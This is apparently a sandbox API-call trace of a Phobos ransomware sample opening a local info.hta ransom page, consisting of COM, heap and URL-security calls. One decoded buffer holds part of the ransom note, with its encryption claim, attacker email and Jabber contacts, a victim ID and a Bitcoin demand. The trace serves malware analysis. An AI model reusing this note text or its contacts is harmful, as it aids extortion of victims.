CMemStm::Write () returned 0x0 [0226.414] CMemStm::Write () returned 0x0 [0226.414] CMemStm::Write () returned 0x0 [0226.414] CMemStm::Write () returned 0x0 [0226.414] CMemStm::Write () returned 0x0 [0226.414] CMemStm::Write () returned 0x0 [0226.414] CMemStm::Write () returned 0x0 [0226.414] CMemStm::Write () returned 0x0 [0226.414] CMemStm::Write () returned 0x0 [0226.414] CMemStm::Write () returned 0x0 [0226.414] CMemStm::Write () returned 0x0 [0226.414] CMemStm::Write () returned 0x0 [0226.414] CMemStm::Release () returned 0x1 [0226.414] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.414] IUnknown:Release (This=0x5205b0) returned 0x2 [0226.414] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.414] CMemStm::Seek () returned 0x0 [0226.414] GetFocus () returned 0x2016c [0226.414] GetCursorPos (in: lpPoint=0x14f2c8 | out: lpPoint=0x14f2c8*(x=449, y=50)) returned 1 [0226.414] ScreenToClient (in: hWnd=0x2016c, lpPoint=0x14f2c8 | out: lpPoint=0x14f2c8) returned 1 [0226.415] GetClientRect (in: hWnd=0x2016c, lpRect=0x14f2b8 | out: lpRect=0x14f2b8) returned 1 [0226.415] GetCurrentProcessId () returned 0x774 [0226.415] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x57e1f0 | out: hHeap=0x510000) returned 1 [0226.415] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5527b0 | out: hHeap=0x510000) returned 1 [0226.415] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5843e8 | out: hHeap=0x510000) returned 1 [0226.415] IUnknown:Release (This=0x53c14c) returned 0xe [0226.415] IUnknown:Release (This=0x545750) returned 0x3 [0226.415] IUnknown:Release (This=0x53c14c) returned 0xd [0226.415] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.416] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.416] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x578aa8 | out: hHeap=0x510000) returned 1 [0226.417] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x584458 | out: hHeap=0x510000) returned 1 [0226.417] IUnknown:Release (This=0x53c14c) returned 0xc [0226.417] IUnknown:Release (This=0x545750) returned 0x2 [0226.417] IUnknown:Release (This=0x53c14c) returned 0xb [0226.417] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.417] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.417] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x556800 | out: hHeap=0x510000) returned 1 [0226.417] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x553d98 | out: hHeap=0x510000) returned 1 [0226.417] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4c) returned 0x54e5c0 [0226.417] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x584748 [0226.417] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x2000) returned 0x57e060 [0226.418] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x54e618 [0226.418] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x14f0f8 | out: ppURI=0x14f0f8*=0x53bdec) returned 0x0 [0226.418] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="about:blank", pdwZone=0x14f0fc, dwFlags=0x0 | out: pdwZone=0x14f0fc*=0xffffffff) returned 0x800c0011 [0226.418] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.418] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.418] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0226.418] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="about:blank", dwAction=0x2106, pPolicy=0x14f100, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x14f100*=0x0) returned 0x0 [0226.418] IUnknown:Release (This=0x53bdec) returned 0x2 [0226.418] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x2c) returned 0x52d850 [0226.464] CMemStm::Clone () returned 0x0 [0226.465] CBaseMoniker::AddRef () returned 0x2 [0226.465] CMemStm::Read () returned 0x0 [0226.465] CMemStm::Read () returned 0x0 [0226.465] CMemStm::Read () returned 0x0 [0226.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x52) returned 0x5511a0 [0226.465] CMemStm::Read () returned 0x0 [0226.465] CMemStm::Read () returned 0x0 [0226.465] CMemStm::Read () returned 0x0 [0226.465] CMemStm::Read () returned 0x0 [0226.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x52) returned 0x551200 [0226.465] CMemStm::Read () returned 0x0 [0226.465] CMemStm::Read () returned 0x0 [0226.465] CMemStm::Read () returned 0x0 [0226.465] CMemStm::Read () returned 0x0 [0226.465] CMemStm::Read () returned 0x0 [0226.465] CMemStm::Read () returned 0x0 [0226.465] CMemStm::Read () returned 0x0 [0226.465] CMemStm::Read () returned 0x0 [0226.465] CMemStm::Read () returned 0x0 [0226.466] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x55aa20 [0226.466] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x40) returned 0x5601d8 [0226.466] CMemStm::Read () returned 0x0 [0226.466] CMemStm::Read () returned 0x0 [0226.466] CMemStm::Read () returned 0x0 [0226.466] CMemStm::Read () returned 0x0 [0226.466] CMemStm::Read () returned 0x0 [0226.466] CMemStm::Release () returned 0x1 [0226.466] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.466] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="file:///C:/users/public/desktop/info.hta", ppmk=0x14f2d0*=0x0, dwFlags=0x1 | out: ppmk=0x14f2d0*=0x54f8a8) returned 0x0 [0226.466] GetFocus () returned 0x2016c [0226.466] GetCursorPos (in: lpPoint=0x14f018 | out: lpPoint=0x14f018*(x=449, y=50)) returned 1 [0226.466] ScreenToClient (in: hWnd=0x2016c, lpPoint=0x14f018 | out: lpPoint=0x14f018) returned 1 [0226.466] GetClientRect (in: hWnd=0x2016c, lpRect=0x14f008 | out: lpRect=0x14f008) returned 1 [0226.466] IUnknown:AddRef (This=0x54f8a8) returned 0x2 [0226.466] IUnknown:QueryInterface (in: This=0x54f8a8, riid=0x740772f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x14f048 | out: ppvObject=0x14f048*=0x54f8b4) returned 0x0 [0226.466] IUriContainer:GetIUri (in: This=0x54f8b4, ppIUri=0x14f09c | out: ppIUri=0x14f09c*=0x53c4ac) returned 0x0 [0226.466] IUnknown:Release (This=0x54f8b4) returned 0x2 [0226.466] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x1c) returned 0x56b5c0 [0226.466] IUnknown:AddRef (This=0x54f8a8) returned 0x3 [0226.466] IUnknown:AddRef (This=0x53c4ac) returned 0x7 [0226.466] IUnknown:QueryInterface (in: This=0x53c4ac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14f074 | out: ppvObject=0x14f074*=0x53c4ac) returned 0x0 [0226.467] IUnknown:Release (This=0x53c4ac) returned 0x7 [0226.467] IUnknown:AddRef (This=0x53c4ac) returned 0x8 [0226.467] IUri:GetScheme (in: This=0x53c4ac, pdwScheme=0x14f06c | out: pdwScheme=0x14f06c*=0x9) returned 0x0 [0226.467] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xc8) returned 0x553d98 [0226.467] GetCurrentProcessId () returned 0x774 [0226.467] IUnknown:QueryInterface (in: This=0x53c4ac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14f074 | out: ppvObject=0x14f074*=0x53c4ac) returned 0x0 [0226.467] IUnknown:Release (This=0x53c4ac) returned 0x8 [0226.467] IUnknown:AddRef (This=0x53c4ac) returned 0x9 [0226.467] IUri:GetScheme (in: This=0x53c4ac, pdwScheme=0x14f044 | out: pdwScheme=0x14f044*=0x9) returned 0x0 [0226.467] IUnknown:QueryInterface (in: This=0x53c4ac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14eff8 | out: ppvObject=0x14eff8*=0x53c4ac) returned 0x0 [0226.467] IUnknown:Release (This=0x53c4ac) returned 0x9 [0226.467] IUnknown:AddRef (This=0x53c4ac) returned 0xa [0226.467] IUnknown:Release (This=0x53c4ac) returned 0x9 [0226.467] IUri:GetAbsoluteUri (in: This=0x53c4ac, pbstrAbsoluteUri=0x14f074 | out: pbstrAbsoluteUri=0x14f074*="file:///C:/users/public/desktop/info.hta") returned 0x0 [0226.467] SysStringLen (param_1="file:///C:/users/public/desktop/info.hta") returned 0x28 [0226.467] CreateUri (in: pwzURI="file:///C:/users/public/desktop/info.hta", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x14f090 | out: ppURI=0x14f090*=0x53c65c) returned 0x0 [0226.467] IUnknown:Release (This=0x53c4ac) returned 0x8 [0226.467] IUri:GetScheme (in: This=0x53c65c, pdwScheme=0x14f024 | out: pdwScheme=0x14f024*=0x9) returned 0x0 [0226.467] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.467] IUnknown:AddRef (This=0x53c65c) returned 0x3 [0226.467] IUri:GetAbsoluteUri (in: This=0x53c65c, pbstrAbsoluteUri=0x56b5c0 | out: pbstrAbsoluteUri=0x56b5c0*="file:///C:/users/public/desktop/info.hta") returned 0x0 [0226.467] SetTimer (hWnd=0x2016c, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0226.467] ParseURLW (in: pcszURL="file:///C:/users/public/desktop/info.hta", ppu=0x14f020 | out: ppu=0x14f020) returned 0x0 [0226.468] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x55aa40 [0226.595] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x14) returned 0x55aa60 [0226.595] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x5601d8, Size=0x60) returned 0x55cae0 [0226.596] GetCursorPos (in: lpPoint=0x14ee70 | out: lpPoint=0x14ee70*(x=449, y=50)) returned 1 [0226.596] ScreenToClient (in: hWnd=0x2016c, lpPoint=0x14ee70 | out: lpPoint=0x14ee70) returned 1 [0226.596] GetKeyState (nVirtKey=16) returned 0 [0226.596] GetKeyState (nVirtKey=17) returned 0 [0226.596] GetKeyState (nVirtKey=18) returned 0 [0226.596] GetKeyState (nVirtKey=160) returned 0 [0226.596] GetKeyState (nVirtKey=162) returned 0 [0226.596] GetKeyState (nVirtKey=164) returned 0 [0226.596] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x30) returned 0x55dc48 [0226.596] GetCurrentThreadId () returned 0xc4 [0226.596] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x55dc48 | out: hHeap=0x510000) returned 1 [0226.596] GetCurrentThreadId () returned 0xc4 [0226.596] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x56) returned 0x551260 [0226.596] ParseURLW (in: pcszURL="file:///C:/users/public/desktop/info.hta", ppu=0x14f010 | out: ppu=0x14f010) returned 0x0 [0226.596] CreateUri (in: pwzURI="file:///C:/users/public/desktop/info.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x14eff4 | out: ppURI=0x14eff4*=0x53c4ac) returned 0x0 [0226.596] IUnknown:AddRef (This=0x53c4ac) returned 0xa [0226.596] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", pdwZone=0x14ef94, dwFlags=0x0 | out: pdwZone=0x14ef94*=0xffffffff) returned 0x800c0011 [0226.596] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.596] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.596] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0226.596] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", dwAction=0x2700, pPolicy=0x14ef98, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x14ef98*=0x0) returned 0x0 [0226.596] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.596] IUnknown:Release (This=0x53c4ac) returned 0x9 [0226.596] IUnknown:Release (This=0x53c4ac) returned 0x8 [0226.596] IUnknown:AddRef (This=0x53c65c) returned 0x4 [0226.596] IUri:GetPropertyDWORD (in: This=0x53c65c, uriProp=0x11, pdwProperty=0x14edcc, dwFlags=0x0 | out: pdwProperty=0x14edcc*=0x9) returned 0x0 [0226.597] IUnknown:Release (This=0x53c65c) returned 0x3 [0226.597] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x56) returned 0x5512c0 [0226.597] IInternetSecurityManager:GetSecurityId (in: This=0x543ed0, pwszUrl="file:///C:/users/public/desktop/info.hta", pbSecurityId=0x14ee28, pcbSecurityId=0x14ee24*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14ee28*=0x66, pcbSecurityId=0x14ee24*=0x9) returned 0x0 [0226.597] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", pbSecurityId=0x14ee28, pcbSecurityId=0x14ee24*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14ee28*=0x0, pcbSecurityId=0x14ee24*=0x200) returned 0x800c0011 [0226.597] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5512c0 | out: hHeap=0x510000) returned 1 [0226.597] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.597] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x9) returned 0x584760 [0226.597] StrCmpICW (pszStr1="file:///C:/users/public/desktop/info.hta", pszStr2="res://ieframe.dll/PhishSite.htm") returned -12 [0226.597] IUnknown:QueryInterface (in: This=0x53c4ac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14efbc | out: ppvObject=0x14efbc*=0x53c4ac) returned 0x0 [0226.597] IUnknown:Release (This=0x53c4ac) returned 0x8 [0226.597] IUnknown:AddRef (This=0x53c4ac) returned 0x9 [0226.597] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x12c) returned 0x5843e8 [0226.597] CBaseMoniker::AddRef () returned 0x2 [0226.597] IUnknown:AddRef (This=0x53c4ac) returned 0xa [0226.597] IUnknown:QueryInterface (in: This=0x53c4ac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14ef80 | out: ppvObject=0x14ef80*=0x53c4ac) returned 0x0 [0226.597] IUnknown:Release (This=0x53c4ac) returned 0xa [0226.597] IUnknown:AddRef (This=0x53c4ac) returned 0xb [0226.597] IUnknown:Release (This=0x53c4ac) returned 0xa [0226.598] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x3c) returned 0x5601d8 [0226.598] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xb4) returned 0x553e68 [0226.598] IUri:GetScheme (in: This=0x53c4ac, pdwScheme=0x14f004 | out: pdwScheme=0x14f004*=0x9) returned 0x0 [0226.598] IUri:IsEqual (in: This=0x53c65c, pUri=0x53c4ac, pfEqual=0x14f04c | out: pfEqual=0x14f04c*=1) returned 0x0 [0226.598] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.598] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4c) returned 0x54e618 [0226.598] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x12) returned 0x55aa80 [0226.598] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x50) returned 0x54e670 [0226.598] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x60) returned 0x55cb48 [0226.598] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x12c) returned 0x54a420 [0226.598] IUnknown:AddRef (This=0x53c4ac) returned 0xb [0226.598] IUnknown:QueryInterface (in: This=0x53c4ac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14efa0 | out: ppvObject=0x14efa0*=0x53c4ac) returned 0x0 [0226.598] IUnknown:Release (This=0x53c4ac) returned 0xb [0226.598] IUnknown:AddRef (This=0x53c4ac) returned 0xc [0226.598] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4c) returned 0x54e6c8 [0226.599] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x68) returned 0x584520 [0226.599] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x108) returned 0x54a558 [0226.599] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x584778 [0226.599] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xcc) returned 0x53d2f8 [0226.599] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x584790 [0226.599] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x30) returned 0x55dc80 [0226.599] IUnknown:AddRef (This=0x545750) returned 0x3 [0226.599] IUnknown:AddRef (This=0x53c4ac) returned 0xd [0226.599] IUnknown:QueryInterface (in: This=0x53c4ac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14ef60 | out: ppvObject=0x14ef60*=0x53c4ac) returned 0x0 [0226.599] IUnknown:Release (This=0x53c4ac) returned 0xd [0226.599] IUnknown:AddRef (This=0x53c4ac) returned 0xe [0226.599] IUri:GetScheme (in: This=0x53c4ac, pdwScheme=0x14ef64 | out: pdwScheme=0x14ef64*=0x9) returned 0x0 [0226.599] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1006) returned 0x556800 [0226.599] CMemStm::Read () returned 0x0 [0226.599] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4c) returned 0x54e720 [0226.599] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x200c) returned 0x570a98 [0226.600] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x2006) returned 0x572ab0 [0226.600] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x556800, cbMultiByte=4096, lpWideCharStr=0x572ab4, cchWideChar=4096 | out: lpWideCharStr="\r\n\r\n \r\n \r\n phobos\r\n\r\n \r\n\r\n \r\n\r\n \r\n \r\n\r\n \r\n
    \r\n\x09\x09\r\n\x09\x09
    All your files have been encrypted!
    \r\n\x09
    \r\n
    All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail tedmundboardus@aol.com
    \x09
    Write this ID in the title of your message 9C354B42-0001
    \r\n\x09
    In case of no answer in 24 hours write us to this e-mail:tylecotebenji@aol.com
    \r\n\x09
    If there is no response from our mail, you can install the Jabber client and write to us in support of phobos_helper@xmpp.jp
    \r\n
    \r\n\x09\x09You have to pay for decryption in Bitcoins. The price d") returned 4096 [0226.600] CMemStm::Read () returned 0x0 [0226.601] IUnknown:Release (This=0x53c4ac) returned 0xd [0226.601] IUnknown:Release (This=0x53c65c) returned 0x2 [0226.601] IUnknown:Release (This=0x54f8a8) returned 0x2 [0226.601] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.601] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x551200 | out: hHeap=0x510000) returned 1 [0226.601] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.601] IUnknown:Release (This=0x53c4ac) returned 0xc [0226.601] IUnknown:Release (This=0x53c4ac) returned 0xb [0226.601] CMemStm::Release () returned 0x1 [0226.601] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.601] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5511a0 | out: hHeap=0x510000) returned 1 [0226.601] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.601] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.601] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.601] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.601] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.601] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.601] IUnknown:Release (This=0x54f8a8) returned 0x1 [0226.601] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.601] CoTaskMemFree (pv=0x0) [0226.601] IUnknown:AddRef (This=0x53c4ac) returned 0xc [0226.601] IUri:GetPropertyDWORD (in: This=0x53c4ac, uriProp=0x11, pdwProperty=0x14ed64, dwFlags=0x0 | out: pdwProperty=0x14ed64*=0x9) returned 0x0 [0226.601] IUnknown:Release (This=0x53c4ac) returned 0xb [0226.602] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x56) returned 0x5511a0 [0226.602] IInternetSecurityManager:GetSecurityId (in: This=0x543ed0, pwszUrl="file:///C:/users/public/desktop/info.hta", pbSecurityId=0x14efc8, pcbSecurityId=0x14edc0*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14efc8*=0x66, pcbSecurityId=0x14edc0*=0x9) returned 0x0 [0226.602] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", pbSecurityId=0x14efc8, pcbSecurityId=0x14edc0*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14efc8*=0x0, pcbSecurityId=0x14edc0*=0x200) returned 0x800c0011 [0226.602] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5511a0 | out: hHeap=0x510000) returned 1 [0226.602] IUnknown:AddRef (This=0x53c65c) returned 0x3 [0226.602] IUri:GetPropertyDWORD (in: This=0x53c65c, uriProp=0x11, pdwProperty=0x14ed64, dwFlags=0x0 | out: pdwProperty=0x14ed64*=0x9) returned 0x0 [0226.602] IUnknown:Release (This=0x53c65c) returned 0x2 [0226.602] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x56) returned 0x5511a0 [0226.602] IInternetSecurityManager:GetSecurityId (in: This=0x543ed0, pwszUrl="file:///C:/users/public/desktop/info.hta", pbSecurityId=0x14edc8, pcbSecurityId=0x14edc4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14edc8*=0x66, pcbSecurityId=0x14edc4*=0x9) returned 0x0 [0226.602] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", pbSecurityId=0x14edc8, pcbSecurityId=0x14edc4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14edc8*=0x0, pcbSecurityId=0x14edc4*=0x200) returned 0x800c0011 [0226.602] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5511a0 | out: hHeap=0x510000) returned 1 [0226.602] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x52d930 | out: hHeap=0x510000) returned 1 [0226.602] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5533f8 | out: hHeap=0x510000) returned 1 [0226.602] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.602] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.602] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.666] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.666] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.666] IUnknown:Release (This=0x543ed0) returned 0x0 [0226.666] IUnknown:Release (This=0x5426b4) returned 0x0 [0226.666] IUnknown:Release (This=0x744796bc) returned 0x7 [0226.666] IUnknown:AddRef (This=0x53c4ac) returned 0xc [0226.666] IUri:GetPropertyDWORD (in: This=0x53c4ac, uriProp=0x11, pdwProperty=0x14f09c, dwFlags=0x0 | out: pdwProperty=0x14f09c*=0x9) returned 0x0 [0226.666] IUnknown:Release (This=0x53c4ac) returned 0xb [0226.666] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x5426ac, dwReserved=0x0 | out: ppSM=0x5426ac*=0x55cbb0) returned 0x0 [0226.666] IInternetSecurityManager:SetSecuritySite (This=0x55cbb0, pSite=0x5426b4) returned 0x0 [0226.666] IUnknown:AddRef (This=0x5426b4) returned 0xc8 [0226.666] IUnknown:QueryInterface (in: This=0x5426b4, riid=0x753261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x14d064 | out: ppvObject=0x14d064*=0x5426b8) returned 0x0 [0226.666] IServiceProvider:QueryService (in: This=0x5426b8, guidService=0x7532f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7532f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x55cbd8 | out: ppvObject=0x55cbd8*=0x0) returned 0x80004002 [0226.666] IServiceProvider:QueryService (in: This=0x5426b8, guidService=0x7532f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7532f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x55cbd4 | out: ppvObject=0x55cbd4*=0x0) returned 0x80004002 [0226.666] IServiceProvider:QueryService (in: This=0x5426b8, guidService=0x7531c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7531c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x55cbd0 | out: ppvObject=0x55cbd0*=0x744796bc) returned 0x0 [0226.667] IUnknown:Release (This=0x5426b8) returned 0x0 [0226.667] 